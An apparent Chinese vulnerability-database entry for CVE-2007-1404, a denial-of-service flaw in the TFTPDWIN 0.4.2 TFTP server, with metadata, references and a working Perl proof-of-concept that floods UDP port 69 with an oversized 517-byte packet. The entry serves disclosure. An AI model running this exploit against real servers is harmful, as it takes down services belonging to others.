ProSysInfo TFTP Server TFTPDWIN tftpd.exe 拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112391 漏洞类型 未知
发布时间 2007-03-08 更新时间 2007-03-10
CVE编号 CVE-2007-1404 CNNVD-ID CNNVD-200703-319
漏洞平台 Windows CVSS评分 7.3
|漏洞来源
https://www.exploit-db.com/exploits/3432
https://www.securityfocus.com/bid/86532
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-319
|漏洞详情
ProSysInfoTFTPServerTFTPDWIN0.4.2版本的tftpd.exe允许远程攻击者借助一个长的UDP信息包,引起拒绝服务攻击。该信息包未能在recv_from调用中得到正确处理。注意:该漏洞可能与CVE-2006-4948有关。
|漏洞EXP
#!/usr/bin/perl
#
#                            TFTPDWIN Server UDP DOS 0.4.2 POC 
#			            written By : Umesh Wanve (umesh_345@yahoo.com)
#	
#-------------------------------------------------------------------------------

# TFTPDWIN Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.tftpserver.prosysinfo.com.pl)
# A vulnerability has been identified in TFTP Server TFTPDWIN Server v0.4.2, which 
# could be exploited by remote or local attackers to execute arbitrary commands 
# or cause a denial of service. This flaw is when attacker sends UDP packet of length more than 516 bytes

#

#----------------------------Start of Code-------------------------------------



use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "69",

Proto    => "UDP"))
{
                
                 print $socket "A" x 517;
                 sleep(1);
			
                
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:69\n";
}

# milw0rm.com [2007-03-08]
|受影响的产品
ProSysInfo Tftp Server Tftpdwin 0.4.2
|参考资料

来源:MILW0RM
名称:3432
链接:http://www.milw0rm.com/exploits/3432
来源:SECUNIA
名称:24452
链接:http://secunia.com/advisories/24452
来源:OSVDB
名称:33919
链接:http://osvdb.org/33919
来源:XF
名称:tftpdwin-recvfrom-dos(32886)
链接:http://xforce.iss.net/xforce/xfdb/32886